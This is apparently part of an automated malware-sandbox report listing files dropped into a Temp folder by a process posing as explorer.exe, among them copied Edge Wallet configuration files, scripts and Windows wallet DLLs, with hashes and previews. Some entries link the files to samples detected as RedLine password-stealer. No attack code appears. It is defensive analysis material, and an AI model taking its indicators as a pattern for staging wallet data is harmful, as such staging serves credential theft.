                                                                                                                                    Preview:{. "eligible_sites": [. "alexandani.com",. "manitobaharvest.com",. "alphamarts.com",. "thrivecausemetics.com",. "fashionnova.com",. "32degrees.com",. "22daysnutrition.com",. "4moms.com",. "525america.com",. "7point62design.com",. "89thandmadison.com",. "9five.com",. "secure.abugarcia.com",. "activefaithsports.com",. "adika.com",. "afloral.com",. "agacistore.com",. "agiftpersonalized.com",. "ahlstore.com",. "airocollective.com",. "akademapro.com",. "alen.com",. "all3sports.com",. "aloha.com",. "amalfidecor.com",. "americanmattress.com",. "anbbaby.com",. "annchery.com.co",. "annke.com",. "apeainthepod.com",. "appaman.com",. "asdmbeverlyhills.com",. "atmcollection.com",. "ayurvedicherbsdirect.com",. "babywise.life",. "backdropoutlet.com",

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites.json

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):511367
                                                                                                                                    Entropy (8bit):4.176029309359711
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:hQPjhuz14uvgCmWH3+klkfzTOJHYUbHG+FZ8QTHNGs5AeCc:4tKH6bfoGQ8+eer
                                                                                                                                    MD5:D8E3873FF6EF3896A95B8295E3BC1ADF
                                                                                                                                    SHA1:E86D59201F29CD7B7591CCC2CB0832B2E60305D5
                                                                                                                                    SHA-256:22B903D55F643E384F7A09C67A659DA7A86FD409DD1C5439B712B9735D748BAF
                                                                                                                                    SHA-512:70ACE9B563FF2F6B50415EC0F2E6824B369879E9A84699B78FF764D5FF7F91CE5521ADD770ED2740D582FD801FE2E12A5F68212B78ECD2D7FDA849A516739786
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:{. "eligible_sites": [. "alexandani.com". ],. "bgaa_eligible_sites": [. "fashionnova.com". ],. "deep_autofill_sites": [. "lifeisgood.com". ],. "deep_autofill_sites_config": {. "default": [. "lifeisgood.com". ],. "selfhost": [. "nationalcar.com". ]. },. "expansion_sites": {. "default": [. "expedia.com". ],. "se2_patch": [. "hotels.com". ]. },. "billing_address_first_sites": [. "pay.openai.com". ],. "extra_sites": {. "4th_extra_sites": [],. "recovery_sites": [. "easyjet.com". ]. },. "globalization_sites": [. "pay.ebay.de". ],. "coupons_disallowed_sites": [. "hexclad.com",. "store.ui.com",. "omahasteaks.com",. "cart.hostinger.com",. "aliexpress.com",. "winecountrygiftbaskets.com",. "discountmugs.com",. "secure.booking.c

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-notification-config.json

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):726
                                                                                                                                    Entropy (8bit):4.712288740160571
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:AVYNAYLEHCU/IaYeg7BHjg0C1/oOZO5OmS2YdSui8C/FtJp/FJL4nJL4r:sYdCC0ICgNHjg7iOZO5OmSnS82FtzFJl
                                                                                                                                    MD5:89AF93724226AEE6FCF672F1AEE1A738
                                                                                                                                    SHA1:2F188E2FB26CD1C3E3A669E78A4B439A8006CBE3
                                                                                                                                    SHA-256:654AEBC5EF8B3FE48E9D4CFD2634B7DE5172C5AAF309136381347AAB3850DD1D
                                                                                                                                    SHA-512:E1C87CAA76652377825301CDA123AB59AF7CF73D60E54A8F77FC1782333BE21FBCE146EDCCA1B992FC6613970C216282DFB96B9A9C0BA3E75FBFA7BB6CFB381B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:{. "eligible_types": [. "CardExpired",. "CardExpiring",. "PasswordLeakage",. "PersonalizedOffersAvailable",. "UpcomingHotelReservations",. "SignupCryptoWallet",. "CardTokenizationEligible",. "FeaturePromotion",. "DonationSummary",. "RoamCard",. "PackageTracking",. "Rebates". ],. "snooze_time_in_hour": 168,. "refresh_time_in_hour": 12,. "rotate_time_in_hour": 12,. "notification_build_time_after_start_up_in_second": 60,. "card_expired_evaluation_in_months": 1,. "feature_promotion_notification_config": {. },. "account_config": {. "CardExpired": {. "AAD": false,. "Profile": false. },. "CardExpiring": {. "AAD": false,. "Profile": false. }. }.}.

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-pre-stable.json

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2333505
                                                                                                                                    Entropy (8bit):4.1160651167114075
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:49152:aYFYSiXPjpqxbq9emiTQuyg7oM2e8P/bzEb:5
                                                                                                                                    MD5:545D2B1151BBE0470732A5EC71ABCD3B
                                                                                                                                    SHA1:0B58343060A3BA011D72EE42EE2FEA620FF6F0B5
                                                                                                                                    SHA-256:5FD4740C0728516AF8207E28FF02298CCFBC8E591E231B239D3F6324263000F8
                                                                                                                                    SHA-512:86971C4A74B78BC7A1618FBD9B9A50E006ED5921C3BB4660AB4D4FC89A16984DADB614B71FFE42208676A3D6B882E959A72125A684D31F789E26ADA01363491F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:{. "providers": {. "min_shopping_component_version": "2.0.0.1471",. "zip_pay": {. "period": 4,. "lower_threshold": 35,. "upper_threshold": 1000,. "number_of_payments": 4,. "duration": 6,. "days_to_first_payment": 0,. "is_enabled": true,. "eligible_sites": [],. "ineligible_sites": [. "affirm.com",. "klarna.com",. "sams.com",. "samsclub.com",. "walmart.com",. "zip.co". ],. "allowed_domains_native": [. "edge://wallet-extra". ],. "allowed_domains_full": [. "quadpayasserts.blob.core.windows.net",. "maps.googleapis.com",. "maps.gstatic.com". ],. "allowed_domains_root": [. "quadpay.com",. "zip.co",. "quadpay.xyz",. "stripe.com",. "datadoghq.com",. "optimizely.com",. "segment.com". ]. },. "klarna": {. "period": 4,. "lower_threshold": 35,. "upper_threshold": 5000,. "

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-stable.json

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2333505
                                                                                                                                    Entropy (8bit):4.1160651167114075
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:49152:yYFYSiXPjpqxbq9emiTQuyg7oM2e8P/bzEb:h
                                                                                                                                    MD5:B5E29F86A7ACBDD0EDE545049C1DDEE8
                                                                                                                                    SHA1:44E139BA78BBCDC6951E39DE2476653CC656B1E4
                                                                                                                                    SHA-256:CA532B6E7F494987DDF00E52857A3859F77B225FA8D4BD9F708E40D29138C383
                                                                                                                                    SHA-512:72DC3428AF2DE97BFB06AC4B92AA137D9532903A99ACA50D862EA375907D9C45CE8A980429A7BACEAD8F50470EEF77AAEAEE3BEA63D45B7E62CC16540E83723A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:{. "providers": {. "min_shopping_component_version": "2.0.0.1471",. "zip_pay": {. "period": 4,. "lower_threshold": 35,. "upper_threshold": 1000,. "number_of_payments": 4,. "duration": 6,. "days_to_first_payment": 0,. "is_enabled": true,. "eligible_sites": [],. "ineligible_sites": [. "affirm.com",. "klarna.com",. "sams.com",. "samsclub.com",. "walmart.com",. "zip.co". ],. "allowed_domains_native": [. "edge://wallet-extra". ],. "allowed_domains_full": [. "quadpayasserts.blob.core.windows.net",. "maps.googleapis.com",. "maps.gstatic.com". ],. "allowed_domains_root": [. "quadpay.com",. "zip.co",. "quadpay.xyz",. "stripe.com",. "datadoghq.com",. "optimizely.com",. "segment.com". ]. },. "klarna": {. "period": 4,. "lower_threshold": 35,. "upper_threshold": 5000,. "

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):24248
                                                                                                                                    Entropy (8bit):3.4164368811372614
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:0IeMXlcNhErDo1yGI+MmsMR6Q9GMKPrZnfB4FXZ8N:XNXlcNSrD83I+B9wC0
                                                                                                                                    MD5:634323483C6BF97F0D946912B3452604
                                                                                                                                    SHA1:BD41635B68E90DB709CC328307EA19D561B9B92B
                                                                                                                                    SHA-256:CCC9802D871B81D34CE2433865FF817DBED0DCD4D8B1B4C1746D03DAB714E185
                                                                                                                                    SHA-512:BD069F141BD0D65430365B088CA5D0F33BF96EA0D5D0B8236657A60964705366F852E7D9813D56571DF00423668A023162F6C6CE4FA9B4CFAD5BC4629DB95DB0
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:{. "providers": {. "visa": {. "eligible_sites": [. "microsoft.com",. "skype.com",. "github.com",. "linkedin.com",. "minecraft.net",. "xbox.com". ],. "ineligible_sites": [],. "eligible_bins": []. },. "mastercard": {. "eligible_sites": [],. "ineligible_sites": [. "acornonline.com",. "aladdinbroadwaymerchandise.com",. "alamo.com",. "allposters.com",. "alaskaair.com",. "allswellhome.com",. "arbys.com",. "art.com",. "autozone.com",. "basbleu.com",. "baskinrobbins.com",. "bbhosted.com",. "beenverified.com",. "bestbuy.com",. "bestbuybusiness.com",. "bloomingdales.com",. "bonobos.com",. "buffalowildwings.com",. "bumper.com",. "carrentals.com",. "carters.com",. "caseys.com",. "catalogclassicsvipinsider.com",. "cfr.org",. "classicvacations.com

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet-crypto.html

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (560)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2016
                                                                                                                                    Entropy (8bit):5.2326275607435475
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:0+HmvJYDPPZPF/Y6bDXqAtfvywprAGPytsyQDgAg8CgMgsu:HHiYDHL/Y6bTqif6OPN/+hTu
                                                                                                                                    MD5:81DF34766617144867F4AA3ABF8688FA
                                                                                                                                    SHA1:ACEE23B633CBFC9148C777293227C71D153F8DC4
                                                                                                                                    SHA-256:8CA6D41A47EC7C47D924373EB7B612B5AE01CEBA4CE2947427D97C7A0C345CB9
                                                                                                                                    SHA-512:022DAFA520DD4AC9C3CA75E3F1399D587132B272DA85DEA0DDCB844801E315777D4314035EAEE8459073D38911B321AA26BEF8A13F79115C5FE095983D057D7C
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:<!doctype html><html dir="$i18n{textdirection}" lang="$i18n{language}"><head><meta charset="utf-8"><meta version="39855961/20314 - 2023-09-29T14:49:55.553Z"><title>Wallet</title><script src="/app-setup.js"></script><script src="/base-error-reporting.js"></script><script src="/wallet-error-reporting.js"></script><link rel="manifest" href="/manifest.webapp.json"><script src="chrome://resources/js/load_time_data.m.js" type="module"></script><script src="/strings.m.js" type="module"></script><style>/* Copyright (C) Microsoft Corporation. All rights reserved.. * Use of this source code is governed by a BSD-style license that can be. * found in the LICENSE file. */..body {. font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;. font-size: 14px;. background-color: rgb(247, 247, 247);. margin: 0;.}..@media (forced-colors:none) {. input::selection {. color: #FFF;. background: #0078D4;. }.}..@media (p

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet-icon.svg

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1718
                                                                                                                                    Entropy (8bit):6.021574592767348
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:cyKfNbMj9s2LEAiB5Fz5u3DrSpjZdkiREU8d/s:1Kf9WLIrz5uoNyied/s
                                                                                                                                    MD5:09973C50DD24D45F25F51B622B577C8C
                                                                                                                                    SHA1:DFB080015E8375C9DCAFF66A7A8E02D585ED1A9B
                                                                                                                                    SHA-256:51888AFEC19654824E8C4A0293E64319E2D6DF59440D3CE20877BAC2D6404D90
                                                                                                                                    SHA-512:A06A56D7103136BEEC1B83D7BF8CC3148540582A15176470ABFDA83805E0CA0E349BD10A5718D0775F2708234F71DFFC76077F2C4FCB28AEB9A91B1F676022A2
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="32px" height="32px" viewBox="0 0 32 32" enable-background="new 0 0 32 32" xml:space="preserve"> <image id="image0" width="32" height="32" x="0" y="0". href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAQAAADZc7J/AAAABGdBTUEAALGPC/xhBQAAACBjSFJN.AAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAAAmJLR0QA/4ePzL8AAAAJcEhZ.cwAAEisAABDfAW3JFBYAAAAHdElNRQfnCQ0GDDXGZMyrAAACLUlEQVRIx8WUzUuUURTGf2dm/Bip.FNMgknzPqxYVQmULbVEusr+hkezLha4CNxGSkLQvaB/RxiJpFVSLwBkMFNGQJEgK500jhCGNBB01.57SYGU0Jmncm6NzN5Z7zPOfjufdCgSa5BGkHnYTtRcnd6aU8crj9apk17Rzf6Q3+De5c5h4wxktO.UCVXKhcWx31kd87qqpp+qKkEtydTx1O3PMcZHHSDo1TzTVpmPh6qWhuVuozjs13wRrcR1O638O/Q.wFcveWBv8QgNrNIWH3ZKZYhmUkRopJcAa9I98zBbZrfOb44pvV61ho4Va0xNU3oREPex

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2936772
                                                                                                                                    Entropy (8bit):6.105500015703007
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:49152:Xexz5ufAD5J9OOzqrtP27f5FamW+kUbwqL/mQZ2S4Xwt8zH1LLp5XlFLKxf:kf
                                                                                                                                    MD5:9E1D8F6EAE3D15A88DC7E9DA5F2063B8
                                                                                                                                    SHA1:F9FEC6E65B7C8F0CAB1F8F14DAAD5181F250E535
                                                                                                                                    SHA-256:559EC5C6CE51FDDB83D6B33480E47F6A4FF84F6C40C75971C852FE0C47565D6F
                                                                                                                                    SHA-512:FF386A360F939867E564DC4D9D33FF8C49019747BA80FFD4AA8BC17984344AB0D171F6D555FC3AE0F05E51731C885711164F1B8559C98714960672F4DABBC4F6
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:"use strict";(self.webpackChunk_xpay_wallet_hub=self.webpackChunk_xpay_wallet_hub||[]).push([[882],{73213:(e,t,a)=>{var i=a(2784),r=a(47933),n=a(4517),o=a(22168),s=a(8936),l=a(21327),d=a(77953),c=a(28316);let g;var p;(p=g||(g={})).isWalletBNPLAffirmAdaptiveCheckoutEnabled="isWalletBNPLAffirmAdaptiveCheckoutEnabled",p.isTokenizationEnrollRewardsEnabled="isTokenizationEnrollRewardsEnabled",p.isWalletTokenizedAutofillEnabled="isWalletTokenizedAutofillEnabled",p.creditCardUploadEnabled="creditCardUploadEnabled",p.creditCardGlobalizationEnabled="creditCardGlobalizationEnabled",p.creditCardBetterStateTranslationEnabled="creditCardBetterStateTranslationEnabled",p.creditCardSyncCardEnabled="creditCardSyncCardEnabled",p.cardUploadErrorHandling="cardUploadErrorHandling",p.isCreditCardSilentUploadEnabled="creditCardSilentUpload",p.isCreditCardAutoSaveEnabled="creditCardAutoSaveEnabled",p.isWalletPartialCardEnabled="isWalletPartialCardEnabled",p.isWalletHubUXReskinEnabled="isWalletHubUXReskinEnabl

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.html

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (560)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1961
                                                                                                                                    Entropy (8bit):5.238666512277545
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:0+HmWJYDPPZPF/Y6bDXqAtfvywprAGPytsyQDg8CgMgsu:HHpYDHL/Y6bTqif6OPN+hTu
                                                                                                                                    MD5:329C76E386F4AF0BF9913FC7B0E1B620
                                                                                                                                    SHA1:D4FF0F3218F9692861D1A8D103B466AF21068BD1
                                                                                                                                    SHA-256:3272E88523BFAB9B361275DADED5D1F80903C6BA804EE7748AF5FB62BB6FD0B4
                                                                                                                                    SHA-512:43BF017599465A641F0F23B96FF4FD3056F84EF40D5C20F738D22EEFC76DCE3B394A69339B925FD568883660682B700199F0EBE6E37A4A85E70FDD02DFB71F6A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:<!doctype html><html dir="$i18n{textdirection}" lang="$i18n{language}"><head><meta charset="utf-8"><meta version="39855961/20314 - 2023-09-29T14:49:55.552Z"><title>Wallet</title><script src="/app-setup.js"></script><script src="/base-error-reporting.js"></script><script src="/wallet-error-reporting.js"></script><link rel="manifest" href="/manifest.webapp.json"><script src="chrome://resources/js/load_time_data.m.js" type="module"></script><script src="/strings.m.js" type="module"></script><style>/* Copyright (C) Microsoft Corporation. All rights reserved.. * Use of this source code is governed by a BSD-style license that can be. * found in the LICENSE file. */..body {. font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;. font-size: 14px;. background-color: rgb(247, 247, 247);. margin: 0;.}..@media (forced-colors:none) {. input::selection {. color: #FFF;. background: #0078D4;. }.}..@media (p

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet_donation_driver.js

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:ASCII text, with very long lines (865), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):865
                                                                                                                                    Entropy (8bit):4.845776355321752
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:cY6mgfsZCGU8XgEBaIblj7xlnSWZ9ct9TwQ7grRY83cWJzHtGhO5yjHtGv:cHBp4gEBauFlntaTPgrr5HtGs5SHtGv
                                                                                                                                    MD5:8B2D9F03DCBEB1A2F9F0F1CB32DD9313
                                                                                                                                    SHA1:A581AEB20FDD46E10A487E4763F80E03E73F698E
                                                                                                                                    SHA-256:9E2A3D851F4D36712C5E4EBD49D09D67960A82389FD199FFBCDC999C752615B0
                                                                                                                                    SHA-512:24829C02CF85AB18DFCD6C91AE87D564C89136D56C6C85C882CD961756458616FBD2C5DCFEDA2E73B6FED4AD8B6307563AFB9E655378BC3F17BB96CB1984E062
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:!function(){"use strict";let e,n;!function(e){e.checkCanOpenEdgeWalletDonation="checkCanOpenEdgeWalletDonation",e.openEdgeWalletDonation="openEdgeWalletDonation"}(e||(e={})),function(e){e.CanOpenWalletDonation="CanOpenWalletDonation"}(n||(n={}));window.edgeWalletDonationRuntime=new class{raiseMessageFromHost(e){const t=e.shift();t&&n.CanOpenWalletDonation}postMessageToHost(e,n){try{"function"==typeof edgeWalletDonationNativeHandler?.sendMessageToHost&&edgeWalletDonationNativeHandler.sendMessageToHost(e,n)}catch(e){}}initialize(){return!0}},window.addEventListener("message",(function(n){if(n?.data?.type==e.openEdgeWalletDonation){const e=[];e.push(n?.data?.id??""),window.edgeWalletDonationRuntime.postMessageToHost(n.data.type,e)}else n?.data?.type==e.checkCanOpenEdgeWalletDonation&&window.edgeWalletDonationRuntime.postMessageToHost(n.data.type,[])}))}();

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):10752
                                                                                                                                    Entropy (8bit):4.917119327447698
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:Qkk3BzHgYRJzJpb+4EzOxauEcWZyWwrW:azHfRJ1pb+4EzOxaDZyWwrW
                                                                                                                                    MD5:1097D1E58872F3CF58F78730A697CE4B
                                                                                                                                    SHA1:96DB4E4763A957B28DD80EC1E43EB27367869B86
                                                                                                                                    SHA-256:83EC0BE293B19D00ECA4AE51F16621753E1D2B11248786B25A1ABAAE6230BDEF
                                                                                                                                    SHA-512:B933EAC4EAABACC51069A72B24B649B980AEA251B1B87270FF4FFEA12DE9368D5447CDBE748AC7FAF2805548B896C8499F9ECEEED2F5EFD0C684F94360940351
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: SecuriteInfo.com.Trojan.GenericKD.70788680.21050.25766.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: SecuriteInfo.com.BScope.TrojanPSW.RedLine.20889.11478.exe, Detection: malicious, Browse
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%.(.D.{.D.{.D.{.<0{.D.{./.z.D.{./.z.D.{.D.{.D.{./.z.D.{./.z.D.{./.z.D.{./.z.D.{./\{.D.{./.z.D.{Rich.D.{........PE..L.....}...........!.........................0...............................p.......+....@A........................@$......|@.......P..8....................`..........T...........................`................@..x............................text............................... ..`.data...\....0......................@....idata..v....@......................@..@.rsrc...8....P......."..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletProxy.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):36864
                                                                                                                                    Entropy (8bit):5.153561346833534
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:C/gOUmKmcVYF82y+hnVeM1LrB0ZqWF6WZT+vBoYd:C/Am0GLKZJ4po
                                                                                                                                    MD5:D09724C29A8F321F2F9C552DE6EF6AFA
                                                                                                                                    SHA1:D6CE3D3A973695F4F770E7FB3FCB5E2F3DF592A3
                                                                                                                                    SHA-256:23CC82878957683184FBD0E3098E9E6858978BF78D7812C6D7470EBDC79D1C5C
                                                                                                                                    SHA-512:CC8DB1B0C4BBD94DFC8A669CD6ACCF6FA29DC1034CE03D9DAE53D6CE117BB86B432BF040FB53230B612C6E9A325E58ACC8EBB600F760A8D9D6A383CE751FD6ED
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: SecuriteInfo.com.Trojan.GenericKD.70788680.21050.25766.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: SecuriteInfo.com.BScope.TrojanPSW.RedLine.20889.11478.exe, Detection: malicious, Browse
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K......K..H...K..O...K...J..K..J...K..K...K..C...K.....K..I...K.Rich..K.........PE..L..................!.....t...........x...............................................*....@A........................P...n...8........................................s..T............................%..................4............................text....s.......t.................. ..`.data...\............x..............@....idata...............z..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):412160
                                                                                                                                    Entropy (8bit):6.440111636589855
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:Zb4spB+uPpnV5dH+V15pyYy8W/czcJauE:Zb4sB+uPpnVHH+hpyYydczcJY
                                                                                                                                    MD5:02557C141C9E153C2B7987B79A3A2DD7
                                                                                                                                    SHA1:A054761382EE68608B6A3B62B68138DC205F576B
                                                                                                                                    SHA-256:207C587E769E2655669BD3CE1D28A00BCAC08F023013735F026F65C0E3BAA6F4
                                                                                                                                    SHA-512:A37E29C115BCB9956B1F8FD2022F2E3966C1FA2A0EFA5C2EE2D14BC5C41BFDDAE0DEEA4D481A681D13EC58E9DEC41E7565F8B4EB1C10F2C44C03E58BDD2792B3
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: SecuriteInfo.com.Trojan.GenericKD.70788680.21050.25766.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: SecuriteInfo.com.BScope.TrojanPSW.RedLine.20889.11478.exe, Detection: malicious, Browse
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A4u..U...U...U...-..OU...>...U...>...U...U...T...>...U...>...U...>...U...>..<U...>...U...>...U..Rich.U..........................PE..L....Q.=...........!................pJ....................................................@A................................T....................................l...%..T...............................................P............................text............................... ..`.data...............................@....idata..Z...........................@..@.didat..............................@....rsrc...............................@..@.reloc...l.......n..................@..B................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletBackgroundServiceProxy.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):10752
                                                                                                                                    Entropy (8bit):4.917119327447698
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:Qkk3BzHgYRJzJpb+4EzOxauEcWZyWwrW:azHfRJ1pb+4EzOxaDZyWwrW
                                                                                                                                    MD5:1097D1E58872F3CF58F78730A697CE4B
                                                                                                                                    SHA1:96DB4E4763A957B28DD80EC1E43EB27367869B86
                                                                                                                                    SHA-256:83EC0BE293B19D00ECA4AE51F16621753E1D2B11248786B25A1ABAAE6230BDEF
                                                                                                                                    SHA-512:B933EAC4EAABACC51069A72B24B649B980AEA251B1B87270FF4FFEA12DE9368D5447CDBE748AC7FAF2805548B896C8499F9ECEEED2F5EFD0C684F94360940351
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%.(.D.{.D.{.D.{.<0{.D.{./.z.D.{./.z.D.{.D.{.D.{./.z.D.{./.z.D.{./.z.D.{./.z.D.{./\{.D.{./.z.D.{Rich.D.{........PE..L.....}...........!.........................0...............................p.......+....@A........................@$......|@.......P..8....................`..........T...........................`................@..x............................text............................... ..`.data...\....0......................@....idata..v....@......................@..@.rsrc...8....P......."..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletProxy.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):36864
                                                                                                                                    Entropy (8bit):5.153561346833534
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:C/gOUmKmcVYF82y+hnVeM1LrB0ZqWF6WZT+vBoYd:C/Am0GLKZJ4po
                                                                                                                                    MD5:D09724C29A8F321F2F9C552DE6EF6AFA
                                                                                                                                    SHA1:D6CE3D3A973695F4F770E7FB3FCB5E2F3DF592A3
